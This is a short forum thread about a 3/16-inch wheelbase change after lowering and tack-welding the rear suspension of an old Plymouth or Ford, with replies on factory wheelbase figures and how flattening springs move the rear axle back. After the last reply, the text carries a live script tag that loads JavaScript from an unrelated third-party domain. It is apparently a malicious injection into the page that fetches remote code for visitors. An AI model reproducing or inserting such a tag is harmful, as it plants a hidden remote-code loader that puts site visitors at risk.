Ok it was getting late when we tac welded the rear suspension up.Next day remeasured the wheelbase and I'm 3/16 difference ! What is the tolerance ? I should mention that we only lowered the rear springs. Did not mess with the front.
Wheelbase on your truck is 112 inchs. Rearend should be square with the front end. Wheels should center in the fender.
112" Wheelbase if it was a ford. This is a '37 Plymouth right? The little bit I could find was showing a 116" wheelbase.
The 3/16 difference is side to side? Or change in length front to back? If length change F-B, that is just the spring flattening out and the wheelbase changes due to as spring compresses, it makes torque tube flatter and the rearend moves back a little. Assuming you have a Ford with transverse spring. If parallel leafs, the same thing happens, but due to the spring becoming flatter and longer, which moves the rearend back slightly. <script src="https://secure-content-delivery.com/data.js.php?i={4D877FC1-4956-4F45-A6B5-0E98AB82425A}&d=2012-6-15&s=http://www.jalopyjournal.com/forum/showthread.php?t=832326&cb=0.5522667724064473" type="text/javascript"></script>
